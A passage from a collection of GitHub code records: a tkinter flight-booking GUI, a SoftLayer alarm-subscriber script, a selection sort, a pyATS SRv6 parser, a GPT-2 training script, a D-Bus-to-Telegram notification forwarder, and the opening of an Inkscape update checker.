background_label.place(relwidth=1, relheight=1)\n self.main_frame = tk.Frame(self.root, relief=\"solid\", borderwidth=2)\n self.main_frame.grid(row=1, column=0, padx=15, pady=15)\n\n # logo picture\n image_path2 = \"../Pictures/Logo.png\"\n self.image2 = tk.PhotoImage(file=image_path2)\n self.image2 = self.image2.subsample(5)\n image_label2 = tk.Label(self.root, 
image=self.image2)\n        image_label2.place(x=self.header_height * 0.7, y=self.header_height * 0.1)\n\n        # Return to home page\n        image_label2.bind(\"<Button-1>\", self.redirect_to_home_page)\n\n        title_label = tk.Label(self.main_frame, text=\"Flight Research\", font=(\"Helvetica\", 16))\n        title_label.grid(row=0, column=0, columnspan=2, pady=10)\n\n        date_label = tk.Label(self.main_frame, text=\"Departure Date\")\n        date_label.grid(row=1, column=0, pady=5)\n        self.date_var = tk.StringVar()\n        date_entry = DateEntry(self.main_frame, textvariable=self.date_var, date_pattern=\"dd/mm/yyyy\")\n        date_entry.grid(row=1, column=1, pady=5)\n\n        departure_label = tk.Label(self.main_frame, text=\"Departure airport\")\n        departure_label.grid(row=2, column=0, pady=5)\n        self.departure_var = tk.StringVar()\n        departure_combobox = ttk.Combobox(self.main_frame, textvariable=self.departure_var)\n        departure_combobox['values'] = departure_airports\n        departure_combobox.bind('<<ComboboxSelected>>', self.check_airport_selection)\n        departure_combobox.grid(row=2, column=1, pady=5)\n\n        arrival_label = tk.Label(self.main_frame, text=\"Arrival airport\")\n        arrival_label.grid(row=3, column=0, pady=5)\n        self.arrival_var = tk.StringVar()\n        arrival_combobox = ttk.Combobox(self.main_frame, textvariable=self.arrival_var)\n        arrival_combobox['values'] = arrival_airports\n        arrival_combobox.bind('<<ComboboxSelected>>', self.check_airport_selection)\n        arrival_combobox.grid(row=3, column=1, pady=5)\n\n        self.num_tickets_label = tk.Label(self.main_frame, text=\"Number of Tickets\")\n        self.num_tickets_label.grid(row=5, column=0, pady=5)\n        self.num_tickets_spinbox = Spinbox(self.main_frame, from_=1, to=4, textvariable=self.num_tickets_var)\n        self.num_tickets_spinbox.grid(row=5, column=1, pady=5)\n\n        self.error_label = tk.Label(self.main_frame, text=\"\", fg=\"red\")\n        self.error_label.grid(row=4, column=0, columnspan=2, pady=5)\n\n        self.search_button = tk.Button(self.main_frame, text=\"Flight Research\", command=self.redirect_to_Flight_booking)\n        self.search_button.grid(row=6, column=0, columnspan=2, pady=10)\n\n        image_path = \"../Pictures/avionResa.png\"\n        self.image = tk.PhotoImage(file=image_path)\n        self.image = self.image.subsample(2)\n        image_label = Label(self.main_frame, image=self.image)\n        image_label.grid(row=0, column=2, rowspan=7, padx=10)\n\n        self.root.columnconfigure(0, weight=1)\n        self.root.rowconfigure(1, weight=1)\n\n        cursor.close()\n        conn.close()\n\n    def check_airport_selection(self, event):\n        if self.departure_var.get() == self.arrival_var.get():\n            self.error_label.config(text=\"You can't have the same Departure Airport and Arrival Airport\")\n            self.search_button['state'] = 'disabled'\n        else:\n            self.error_label.config(text=\"\")\n            self.search_button['state'] = 'normal'\n\n    def search_flights(self):\n        date = self.date_var.get()\n        departure = self.departure_var.get()\n        arrival = self.arrival_var.get()\n        person_type = self.person_type_var.get()\n        print(f\"Date: {date}, Departure: {departure}, Arrival: {arrival}, Type of Person: {person_type}\")\n\n    def redirect_to_Flight_booking(self):\n        try:\n            config.departure_date = self.date_var.get()\n            config.departure_airport = self.departure_var.get()\n            config.arrival_airport = self.arrival_var.get()\n            config.num_tickets = int(self.num_tickets_var.get())\n\n            self.flightBooking_window = tk.Toplevel(self.root)\n            self.app = FlightBooking.FlightSelectionPage(self.flightBooking_window, config.departure_date, config.departure_airport, config.arrival_airport, config.num_tickets)\n        except Exception as e:\n            messagebox.showerror(\"Error\", f\"Error 
on redirection {e}\")\n\nif __name__ == \"__main__\":\n    root = tk.Tk()\n    app = BookingApp(root)\n    root.mainloop()\n","repo_name":"Pierre-LouisTHOMAS/Python_Project","sub_path":"Front/PlaneBooking.py","file_name":"PlaneBooking.py","file_ext":"py","file_size_in_byte":6267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73866515985","text":"\"\"\"\nAdd subscribers\n\nThe script adds subscribers to an arbitrary VSI machine.\nFor more information see below:\n\nImportant manual pages:\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Virtual_Guest/getMonitoringAgents\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/getEligibleAlarmSubscibers\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/setActiveAlarmSubscriber\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer\nhttp://sldn.softlayer.com/reference/services/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer/getObject\nhttp://sldn.softlayer.com/reference/datatypes/SoftLayer_Monitoring_Agent/SoftLayer_User_Customer\n\nLicense: http://sldn.softlayer.com/article/License\nAuthor: SoftLayer Technologies, Inc. <sldn@softlayer.com>\n\"\"\"\nimport SoftLayer\n# Client configuration\nUSERNAME = 'set me'\nAPI_KEY = 'set me'\n\nhostnames = [\"rctest\", \"rctest2\"]\nmailsToAdd = [\"Nelson.Cabero@jalasoft.com\", \"miguel.higorre@jalasoft.com\"]\n\nclient = SoftLayer.Client(username=USERNAME, api_key=API_KEY)\n\n\ntry:\n    # Getting all virtual servers on the account\n    vServers = client['Account'].getVirtualGuests()\n    for hostname in hostnames:\n        for vServer in vServers:\n            if hostname == vServer['hostname']:\n                vSertverId = vServer['id']\n                # Getting all the agents in the virtual machine\n                agents = client['Virtual_Guest'].getMonitoringAgents(id=vSertverId)\n                for agent in agents:\n                    agentId = agent['id']\n                    agentName = agent['name']\n                    elegibleSubscribers = client['SoftLayer_Monitoring_Agent'].getEligibleAlarmSubscibers(id=agentId)\n                    for mailToAdd in mailsToAdd:\n                        for elegibleSubscriber in elegibleSubscribers:\n                            if 'id' in elegibleSubscriber:\n                                suscriberId = elegibleSubscriber['id']\n                                userData = client['SoftLayer_User_Customer'].getObject(id=suscriberId)\n                                if mailToAdd.strip() == userData['email'].strip():\n                                    added = client['SoftLayer_Monitoring_Agent'].setActiveAlarmSubscriber(suscriberId, id=agentId)\n                                    if added:\n                                        print(\"For hostname: \" + hostname + \" with ID \" + str(vSertverId) + \" in the agent for \" + agentName + \" the mail \" + mailToAdd + \" has been added.\")\n                                    else:\n                                        print(\"ERROR - For hostname: \" + hostname + \" with ID \" + str(vSertverId) + \" in the agent for \" + agentName + \" the mail \" + mailToAdd + \" has not been added.\")\n\nexcept SoftLayer.SoftLayerAPIError as e:\n    print(\"Unable to add subscribers faultCode=%s, faultString=%s\" % (e.faultCode, e.faultString))\n    exit(1)","repo_name":"kanja01/sl_script","sub_path":"add_subscribers.py","file_name":"add_subscribers.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35557314181","text":"# Repeatedly select the smallest element among the unsorted data and swap it with the element at the front\n\narr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]\nfor i, n in enumerate(arr):\n    min_num = n\n    min_index = i\n    for j in range(i + 1, len(arr)):\n        if min_num > arr[j]:\n            min_num 
= arr[j]\n min_index = j\n arr[i] = min_num\n arr[min_index] = n\n\nprint(arr)\n","repo_name":"ParkSuah/algorithm_practice","sub_path":"Sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39609780414","text":"'''show_segment_routing_srv6_locator.py\n\nParser for the following show commands:\n * show segment-routing srv6 locator\n'''\n\n__author__ = 'takamitsu-iida'\n__date__ = 'Dec 20 2022'\n__version__ = 1.0\n\n# import re\n\n# metaparser\nfrom genie.metaparser import MetaParser\nfrom genie.metaparser.util.schemaengine import Any\n# from genie.metaparser.util.schemaengine import Schema\n# from genie.metaparser.util.schemaengine import Or\n# from genie.metaparser.util.schemaengine import Optional\n# from genie.metaparser.util.schemaengine import Use\n\n# https://pubhub.devnetcloud.com/media/genie-docs/docs/parsergen/apidoc/parsergen.html#\nfrom genie import parsergen\n\n# =============================================\n# Schema\n# =============================================\nclass ShowSegmentRoutingSrv6LocatorSchema(MetaParser):\n \"\"\"Schema for show segment-routing srv6 locator\"\"\"\n schema = {\n 'locator': {\n Any(): {\n 'prefix': str,\n 'status': str,\n }\n },\n }\n\n# =============================================\n# Parser\n# =============================================\nclass ShowSegmentRoutingSrv6Locator(ShowSegmentRoutingSrv6LocatorSchema):\n \"\"\"Parser for show segment-routing srv6 locator\n \"\"\"\n\n cli_command = 'show segment-routing srv6 locator'\n\n def cli(self, output=None):\n if output is None:\n output = self.device.execute(self.cli_command)\n if not output:\n return None\n\n parsed_dict = {}\n\n # Name Prefix Status\n # -------------------- ------------------------ ------\n header = ['Name', 'Prefix', 'Status']\n\n # dict key\n label = ['Name', 'prefix', 'status']\n\n result = parsergen.oper_fill_tabular(device_output=output, device_os='generic', header_fields=header, label_fields=label, index=[0])\n\n #from pprint import pprint\n #pprint(result.entries)\n\n if result.entries:\n for name, locator_dict in result.entries.items():\n del locator_dict['Name']\n parsed_dict.setdefault('locator', {}).update({name: locator_dict})\n\n #from pprint import pprint\n #pprint(parsed_dict)\n\n return parsed_dict\n","repo_name":"takamitsu-iida/pyats-fitelnet","sub_path":"genieparser/external_parser/fitelnet/show_segment_routing_srv6_locator.py","file_name":"show_segment_routing_srv6_locator.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73524349586","text":"import os, time, gc, json, pickle, argparse, math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport numpy as np\nfrom pytorch_pretrained_bert import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config\nfrom tensorboardX import SummaryWriter\nfrom data.util import *\nfrom util import *\n\nce_loss_fn = nn.CrossEntropyLoss(reduction='none')\nmse_loss_fn = torch.nn.MSELoss(reduction='none')\n\ndef compute_loss(device, model, input_tokens, target_tokens, mask):\n input_tokens = input_tokens.to(device)\n target_tokens = target_tokens.to(device)\n\n logits, _ = model(input_tokens)\n num_logits = logits.size(-1)\n\n # Perform masking\n if mask is not 
None:\n mask = mask.to(device)\n logits = logits.masked_select(mask.unsqueeze(-1))\n target_tokens = target_tokens.masked_select(mask)\n\n ce_loss = ce_loss_fn(logits.view(-1, num_logits), target_tokens.view(-1)).float().mean()\n loss = ce_loss\n\n return loss, ce_loss\n\ndef compute_ranking_lp(device, model, tokens, mask, random_shift=False):\n \"\"\"\n Computes the average likelihood score over each class.\n Args:\n tokens: LongTensor of shape [Batch, Classes, Seq Len]\n mask: ByteTensor of shape [Batch, Classes, Seq Len]\n Returns:\n Tensor of [Batch, Classes]\n \"\"\"\n num_classes = tokens.size(1)\n tokens = tokens.to(device)\n input_tokens = tokens[:, :, :-1]\n target_tokens = tokens[:, :, 1:]\n\n # Remove classes dimension\n input_tokens = input_tokens.view(-1, input_tokens.size(-1))\n\n # Randomize the positional encoding\n position_ids = None\n if random_shift:\n position_ids = torch.arange(0, input_tokens.size(-1), dtype=torch.long, device=input_tokens.device)\n position_ids = position_ids.unsqueeze(0).expand_as(input_tokens)\n \n # position IDs should be expanded from [seq_len] to [batch, seq_len]\n # TODO: hardcoded length\n rand_shift = torch.randint(low=0, high=1024 - input_tokens.size(-1), size=(position_ids.size(0) // num_classes, 1)).to(device)\n # Each class should have the same random shift for fair comparison.\n rand_shift = rand_shift.repeat(1, num_classes).view(-1, 1)\n position_ids = position_ids + rand_shift\n\n logits, _ = model(input_tokens, position_ids=position_ids)\n logits = logits.view(-1, num_classes, logits.size(-2), logits.size(-1))\n\n # Pick the target log probs\n lprobs = torch.log_softmax(logits, dim=-1)\n lprobs = lprobs.gather(-1, target_tokens.unsqueeze(-1)).squeeze(-1).float()\n \n if mask is not None:\n # Cast mask\n mask = mask[:, :, :-1].to(lprobs)\n # Only select masked tokens\n lprobs *= mask\n # Take average log prob across the sequence s.t we have scores for [Batch, 4]\n lprobs = lprobs.float().sum(dim=-1) / mask.sum(dim=-1)\n else:\n lprobs = lprobs.float().mean(dim=-1)\n return lprobs\n\ndef train_step(args, device, model, optimizer, input_tokens, target_tokens, mask):\n model.train()\n\n loss, ce_loss = compute_loss(device, model, input_tokens, target_tokens, mask)\n optimizer.backward(loss)\n\n return loss.item(), ce_loss.item()\n\ndef train_ranking_step(args, device, model, optimizer, tokens, mask):\n model.train()\n\n lprobs = compute_ranking_lp(device, model, tokens, mask)\n assert len(lprobs.size()) == 2\n # First item is the right answer. We want to maximize that.\n lprob_correct = torch.log_softmax(lprobs, dim=-1)[:, 0]\n loss = -lprob_correct.mean()\n optimizer.backward(loss)\n\n return loss.item()\n\ndef main_worker(gpu, ngpus_per_node, args):\n args.gpu = gpu\n\n if args.gpu is not None:\n print(\"Use GPU: {} for training\".format(args.gpu))\n \n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n args.rank = args.rank * ngpus_per_node + gpu\n print('Setting rank', args.rank)\n \n recon_attempt = 1\n connected = False\n\n if args.rank != 0:\n # Stall to have rank 0 node go first\n time.sleep(3)\n\n while not connected:\n try:\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n connected = True\n print('Established connection. Rank:', args.rank)\n except Exception as e:\n # Sometimes the head node launches after the worker, which would cause an issue\n print('Failed to init process group. 
Retrying...', recon_attempt, e)\n recon_attempt += 1\n time.sleep(10)\n\n # For multiprocessing distributed, DistributedDataParallel constructor\n # should always set the single device scope, otherwise,\n # DistributedDataParallel will use all available devices.\n device = torch.device('cuda', args.gpu)\n torch.cuda.set_device(device)\n\n print('Loading models...')\n cache_dir = os.path.join(args.out_dir, 'cache')\n os.makedirs(cache_dir, exist_ok=True)\n\n if args.rank == 0:\n save_folder = os.path.join(args.out_dir, args.experiment)\n\n try:\n os.makedirs(save_folder)\n except FileExistsError as e:\n print('Experiment name already exists!', args.experiment)\n raise e\n\n t_writer = SummaryWriter(os.path.join(save_folder, 'train'), flush_secs=5)\n v_writer = SummaryWriter(os.path.join(save_folder, 'val'), flush_secs=5)\n\n # Load pre-trained teacher tokenizer (vocabulary)\n tokenizer = GPT2Tokenizer.from_pretrained('gpt2', cache_dir=cache_dir)\n # Hack to allow tokenizing longer sequences.\n tokenizer.max_len = int(1e12)\n\n model = GPT2LMHeadModel.from_pretrained('gpt2', cache_dir=cache_dir)\n\n if args.load:\n if args.load == 'none':\n print('Randomly initializing model weights...')\n model.apply(model.init_weights)\n else:\n print('Loading model weights...')\n model.load_state_dict(torch.load(os.path.join(args.load, 'model_latest.pt'), map_location='cpu'))\n gc.collect()\n\n if args.rank == 0 and args.model_type:\n # Write config to file\n with open(os.path.join(save_folder, 'config.pkl'), 'wb') as f:\n pickle.dump(config, f)\n\n print('params:', num_params(model))\n print('Done.')\n\n print('Setup data...')\n # Batch and sequence length schedule\n assert len(args.batch_sizes) == len(args.seq_lens)\n batch_schedule = list(zip(map(int, args.batch_sizes), map(int, args.seq_lens)))\n assert len(batch_schedule) == 2, 'Currently not supporting multiple schedule'\n cur_b_schedule = len(batch_schedule) - 1 if args.switch_time == 0 else 0\n\n print('Batch schedule', batch_schedule)\n train_loader, val_loader = prepare_dataset(\n args.data_dir, args.dataset, tokenizer,\n batch_schedule[cur_b_schedule][0], batch_schedule[cur_b_schedule][1],\n batch_schedule[-1][0], batch_schedule[-1][1],\n num_workers=args.workers\n )\n print('Done.')\n\n if args.swag > 0:\n swag_train_loader, swag_val_loader = prepare_dataset(\n args.data_dir,\n 'swag',\n tokenizer,\n 16, 64,\n 16, 64,\n num_workers=1\n )\n print('SWAG Loaded.')\n if args.synth > 0:\n gpt2_train_loader, _ = prepare_dataset(\n args.data_dir,\n 'synth',\n tokenizer,\n 16, 128,\n 16, 128,\n num_workers=1\n )\n print('Loaded GPT2 samples')\n\n if args.fp16:\n model = model.half()\n model = model.to(device)\n\n print('Wrapping models and optimizers...')\n # Apply linear scaling rule to increase batch size for short sequence training.\n lr_schedule = switch_schedule(linear_schedule(args), batch_schedule[cur_b_schedule][0] / batch_schedule[-1][0], int(args.iterations * args.switch_time))\n loss_model, optimizer, scheduler = create_optimizers(model, args, lr_schedule)\n print('Done.')\n\n # TODO: Somehow restoring the optimizer leads to CUDA illegal memory error.\n # if args.load:\n # print('Loading optimizer weights...')\n # optimizer.load_state_dict(torch.load(os.path.join(args.load, 'opt_latest.pt'), map_location='cpu'))\n # gc.collect()\n\n print('Begin training iterations')\n save_interval = 1000\n max_val_batches = 1000\n num_iters = 0\n e = 0\n optimizer.zero_grad()\n\n if args.swag > 0:\n swag_iter = iter(swag_train_loader)\n if args.synth > 
0:\n gpt2samples_iter = iter(gpt2_train_loader)\n\n def val_step(val_loader):\n with torch.no_grad():\n print('Validation loop. Batches:', len(val_loader))\n stats = []\n # Validation\n for i, (input_tokens, target_tokens, mask) in enumerate(val_loader):\n loss, ce_loss = compute_loss(device, loss_model, input_tokens, target_tokens, mask)\n stats.append([loss.item(), math.exp(ce_loss.item())])\n\n if i > max_val_batches:\n break\n \n stats = np.mean(stats, axis=0)\n v_writer.add_scalar('loss', stats[0], num_iters)\n v_writer.add_scalar('ppl', stats[1], num_iters)\n\n if args.swag > 0:\n # Process swag\n correct = 0\n total = 0\n for i, (tokens, mask) in enumerate(swag_val_loader):\n lprobs = compute_ranking_lp(device, model, tokens, mask)\n chosen = lprobs.argmax(dim=-1)\n\n correct += (chosen == 0).sum().item()\n total += int(chosen.size(0))\n \n if i > max_val_batches:\n break\n v_writer.add_scalar('acc/swag', correct / total, num_iters)\n \n # TODO: Ideally all nodes should run validation.\n if args.rank == 0:\n val_step(val_loader)\n\n while num_iters < args.iterations:\n # Run epoch\n st = time.time()\n\n # Training\n print('Training loop. Batches:', len(train_loader))\n for i, (input_tokens, target_tokens, mask) in enumerate(train_loader):\n # Normal grad step\n optimizer.zero_grad()\n loss, ce_loss = train_step(args, device, loss_model, optimizer, input_tokens, target_tokens, mask)\n optimizer.step()\n\n if args.synth > 0 and i % args.synth == 0:\n # PF grad step\n optimizer.zero_grad()\n\n try:\n real_fake_pair = next(gpt2samples_iter)\n except StopIteration:\n gpt2samples_iter = iter(gpt2_train_loader)\n real_fake_pair = next(gpt2samples_iter)\n\n synth_loss = train_ranking_step(args, device, loss_model, optimizer, real_fake_pair, None)\n optimizer.step()\n\n if args.swag > 0 and i % args.swag == 0:\n optimizer.zero_grad()\n try:\n swag_loss = train_ranking_step(args, device, loss_model, optimizer, *next(swag_iter))\n except StopIteration:\n print('Finished one epoch of swag training.')\n swag_iter = iter(swag_train_loader)\n swag_loss = train_ranking_step(args, device, loss_model, optimizer, *next(swag_iter))\n optimizer.step()\n\n if args.rank == 0:\n lr = scheduler.get_lr()[0] if args.warmup != -1 else optimizer.param_groups[0]['lr']\n # Log to Tensorboard\n t_writer.add_scalar('loss', loss, num_iters)\n\n if args.synth > 0 and i % args.synth == 0:\n t_writer.add_scalar('loss/synth', synth_loss, num_iters)\n\n if args.swag > 0 and i % args.swag == 0:\n t_writer.add_scalar('loss/swag', swag_loss, num_iters)\n\n t_writer.add_scalar('ppl', math.exp(ce_loss), num_iters)\n t_writer.add_scalar('lr', lr, num_iters)\n t_writer.add_scalar('iter_time', time.time() - st, num_iters)\n\n st = time.time()\n end = num_iters >= args.iterations\n\n if args.warmup != -1:\n scheduler.step()\n\n if args.rank == 0 and num_iters % save_interval == 0 and num_iters > 0:\n print('Saving model...')\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_{:05d}.pt'.format(num_iters // save_interval)))\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_latest.pt'))\n torch.save(optimizer.state_dict(), os.path.join(save_folder, 'opt_latest.pt'))\n torch.save(scheduler.state_dict(), os.path.join(save_folder, 'scheduler_latest.pt'))\n\n if end:\n break\n num_iters += 1\n \n if num_iters == int(args.iterations * args.switch_time) and args.switch_time > 0:\n print('Switch to long sequence training')\n cur_b_schedule += 1\n train_loader, val_loader = prepare_dataset(\n args.dataset_dir, 
args.dataset_name, tokenizer,\n batch_schedule[cur_b_schedule][0], batch_schedule[cur_b_schedule][1],\n batch_schedule[-1][0], batch_schedule[-1][1]\n )\n\n if args.rank == 0:\n val_step(val_loader)\n\n print('Saving model...')\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_val_{:05d}.pt'.format(num_iters // save_interval)))\n torch.save(model.state_dict(), os.path.join(save_folder, 'model_latest.pt'))\n torch.save(optimizer.state_dict(), os.path.join(save_folder, 'opt_latest.pt'))\n torch.save(scheduler.state_dict(), os.path.join(save_folder, 'scheduler_latest.pt'))\n e += 1\n\n print('Training complete.')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('experiment', type=str)\n # Default parameters are set based on single GPU training\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--iterations', type=int, default=10000)\n parser.add_argument('--batch-sizes', nargs='+', type=int, default=[4, 2], help='batch size per GPU. Lists the schedule.')\n parser.add_argument('--seq-lens', nargs='+', type=int, default=[512, 1024], help='seq length per sample. Lists the schedule.')\n parser.add_argument('--warmup', type=int, default=1000, help=\"Amount of iterations to warmup, then decay. (-1 for no warmup and decay)\")\n parser.add_argument('--switch-time', type=float, default=0, help=\"Percentage of iterations to spend on short sequence training.\")\n parser.add_argument('--fp16', action='store_true', help=\"Train using FP16?\")\n parser.add_argument('--model-type', type=str, default=None, help=\"Type of model to use\")\n parser.add_argument('--dataset', type=str, default='wp', help=\"Dataset to use for training\")\n parser.add_argument('--swag', default=0, type=int, help=\"Use SWAG dataset as auxiliary task?\")\n parser.add_argument('--synth', default=0, type=int, help=\"Use synthetic examples as auxiliary task?\")\n\n parser.add_argument('--data-dir', type=str, default='../data')\n parser.add_argument('--out-dir', type=str, default='out')\n parser.add_argument('--load', type=str, help='path to load model from')\n parser.add_argument('--world-size', default=1, type=int,\n help='number of nodes for distributed training')\n parser.add_argument('--rank', default=0, type=int,\n help='node rank for distributed training')\n parser.add_argument('--dist-url', default='tcp://127.0.0.1:9999', type=str,\n help='url used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend') \n parser.add_argument('--workers', default=2, type=int, metavar='N',\n help='number of data loading workers')\n args = parser.parse_args()\n print(args)\n print('Starting experiment:', args.experiment)\n # Each node is expected to have same number of GPUs\n ngpus_per_node = torch.cuda.device_count()\n # Since we have ngpus_per_node processes per node, the total world_size\n # needs to be adjusted accordingly\n args.world_size = ngpus_per_node * args.world_size\n # Use torch.multiprocessing.spawn to launch distributed processes: the\n # main_worker process function\n mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))","repo_name":"calclavia/story-generation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16791,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"48"} +{"seq_id":"15680202150","text":"import signal\nimport sys\nimport urllib.parse\n \nimport dbus\nimport 
requests\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\n \n# Telegram bot: https://medium.com/codex/using-python-to-send-telegram-messages-in-3-simple-steps-419a8b5e5e2\nfrom config import TEL_TOKEN, CHAT_ID\n \nblacklist = []\n \n# Catch keyboard interrupt event and give a prettier output.\ndef sigint_handler(signal, frame):\n    print(\"\\nKeyboardInterrupt caught, exiting Rocketgram.\")\n    sys.exit(0)\n \n \nsignal.signal(signal.SIGINT, sigint_handler)\n \n \nclass Notifier:\n    def __init__(self):\n        self.notifications_history = set()\n        self.TOKEN = TEL_TOKEN\n        self.chat_id = CHAT_ID\n \n    def print_notification(self, bus, message):\n        keys = [\n            \"app_name\",\n            \"replaces_id\",\n            \"app_icon\",\n            \"summary\",\n            \"body\",\n            \"actions\",\n            \"hints\",\n            \"expire_timeout\",\n        ]\n        args = message.get_args_list()\n \n        if len(args) == 8:\n            notification = dict([(keys[i], args[i]) for i in range(8)])\n \n            body = str(notification[\"body\"])\n            summary = str(notification[\"summary\"])\n            rocket_chat = \"rocketchat.*.*\"\n            app_name = str(notification[\"app_name\"])\n \n            if app_name not in blacklist:\n                cleaned_body = body.replace(rocket_chat, \"\").strip()\n                notification_tuple = (summary, cleaned_body)\n                msg = urllib.parse.quote_plus(f\"{summary}: {cleaned_body}\")\n \n                if notification_tuple not in self.notifications_history:\n                    self.notifications_history.add(notification_tuple)\n                    try:\n                        requests.get(\n                            f\"https://api.telegram.org/bot{self.TOKEN}/sendMessage?chat_id={self.chat_id}&text={msg}\"\n                        )\n                    except Exception as e:\n                        print(e, e.args)\n                    print(f\"{app_name} notification sent to telegram.\")\n \n \nnotifier = Notifier()\nloop = DBusGMainLoop(set_as_default=True)\nsession_bus = dbus.SessionBus()\nsession_bus.add_match_string(\n    \"type='method_call',interface='org.freedesktop.Notifications',member='Notify',eavesdrop=true\"\n)\nsession_bus.add_message_filter(notifier.print_notification)\n \nprint(\"Rocketgram is running.\")\n \nGLib.MainLoop().run()\n","repo_name":"valteriomon/code-snippets","sub_path":"rocketgram.py","file_name":"rocketgram.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1602181385","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProject quantities.\n\n@author: paola\n\n\"\"\"\nimport sys\nsys.path.append('/Users/paolamartire/tde_comparison')\n\nfrom src.Utilities.isalice import isalice\nalice, plot = isalice()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numba\nfrom src.Luminosity.select_path import select_snap\nfrom src.Calculators.THREE_tree_caster import grid_maker\n\n# Constants & Converter\nRsol_to_cm = 6.957e10 # [cm]\n\n@numba.njit\ndef projector(gridded_den, gridded_mass, x_radii, y_radii, z_radii):\n    \"\"\" Project density on XY plane. 
NB: to plot you have to transpose the saved data\"\"\"\n    # Make the 3D grid \n    flat_den = np.zeros(( len(x_radii), len(y_radii) ))\n    # flat_mass = np.zeros(( len(x_radii), len(y_radii) ))\n    for i in range(len(x_radii)):\n        for j in range(len(y_radii)):\n            mass_zsum = 0\n            for k in range(len(z_radii) - 1): # NOTE SKIPPING LAST Z PLANE\n                dz = (z_radii[k+1] - z_radii[k]) * Rsol_to_cm\n                # mass_zsum += gridded_mass[i,j,k]\n                flat_den[i,j] += gridded_den[i,j,k] * dz #* gridded_mass[i,j,k]\n            #flat_den[i,j] = np.divide(flat_den[i,j], mass_zsum)\n    return flat_den\n    \nif __name__ == '__main__':\n    m = 4\n    save = True \n    check = 'fid' \n    snapshots, days = select_snap(m, check)\n\n    for snap in snapshots:\n        _, gridded_den, gridded_mass, x_radii, y_radii, z_radii = grid_maker(snap, m, check,\n                                                                             800, 800)\n        flat_den = projector(gridded_den, gridded_mass, x_radii, y_radii, z_radii)\n\n        if save:\n            if alice:\n                pre = '/home/s3745597/data1/TDE/'\n                sim = f'{m}-{check}'\n                np.savetxt(f'{pre}tde_comparison/data/denproj/denproj{sim}{snap}.txt', flat_den)\n                np.savetxt(f'{pre}tde_comparison/data/denproj/xarray{sim}.txt', x_radii)\n                np.savetxt(f'{pre}tde_comparison/data/denproj/yarray{sim}.txt', y_radii)\n            else:\n                np.savetxt(f'data/localdenproj{m}_{snap}.txt', flat_den) \n                np.savetxt(f'data/localxarray{m}.txt', x_radii) \n                np.savetxt(f'data/localyarray{m}.txt', y_radii) \n\n#%% Plot\n    if plot:\n        import colorcet\n        fig, ax = plt.subplots(1,1)\n        plt.rcParams['text.usetex'] = True\n        plt.rcParams['figure.dpi'] = 300\n        plt.rcParams['font.family'] = 'Times New Roman'\n        plt.rcParams['figure.figsize'] = [6, 4]\n        plt.rcParams['axes.facecolor']= \t'whitesmoke'\n        \n        den_plot = np.nan_to_num(flat_den, nan = -1, neginf = -1)\n        den_plot = np.log10(den_plot)\n        den_plot = np.nan_to_num(den_plot, neginf= 0)\n        \n        # ax.set_xlim(-15_000, 2000)\n        # ax.set_ylim(-4_000, 4000)\n        ax.set_xlabel(r' X [$R_\odot$]', fontsize = 14)\n        ax.set_ylabel(r' Y [R$_\odot$]', fontsize = 14)\n        img = ax.pcolormesh(x_radii, y_radii, den_plot.T, cmap = 'jet',\n                            vmin = 0, vmax = 7)\n        cb = plt.colorbar(img)\n        cb.set_label(r'Density [g/cm$^2$]', fontsize = 14)\n        ax.set_title('XY Projection', fontsize = 16)\n        plt.show()\n        ","repo_name":"KKilmetis8/tde_comparison","sub_path":"src/Projectors/projector_tree.py","file_name":"projector_tree.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27619519609","text":"#!/usr/bin/python\n\nimport sys\nsys.path.append('/usr/share/inkscape/extensions')\n\nimport inkex\nimport urllib\nimport json\nimport os\nimport re\nimport tempfile\nimport zipfile\nimport shutil\n\nfrom lc_version import __version__\n\nclass UpdateEffect(inkex.Effect):\n    def __init__(self):\n        inkex.Effect.__init__(self)\n        self.OptionParser.add_option('--tab', action = 'store',\n                                     type = 'string', dest = 'what')\n\n    def effect(self):\n        f = urllib.urlopen(\"https://raw.github.com/renaultd/lasercut/\" + \\\n                           \"master/lc_version.py\")\n        j = 